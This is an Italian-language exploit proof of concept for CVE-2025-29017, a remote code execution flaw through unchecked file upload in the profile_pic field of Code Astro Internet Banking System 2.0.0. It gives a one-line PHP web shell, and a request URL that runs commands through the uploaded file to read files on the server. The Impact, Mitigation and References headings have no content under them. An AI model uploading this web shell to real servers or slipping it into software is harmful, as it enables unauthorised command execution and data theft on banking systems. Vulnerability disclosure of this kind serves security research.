
Exploit proof-of-concept per CVE-2025-29017, che dimostra l'esecuzione remota di codice tramite caricamento di file dannosi in Code Astro Internet Banking System 2.0.0.
Esiste una vulnerabilità di Esecuzione di Codice Remoto (RCE) in Code Astro Internet Banking System 2.0.0 a causa di una convalida impropria del caricamento dei file nel parametro profile_pic all'interno di pages_view_client.php. Gli attaccanti possono eludere i controlli di sicurezza modificando la richiesta di caricamento, portando a esecuzione di codice arbitrario.
profile_pic in pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Impatto
Mitigazione
Riferimenti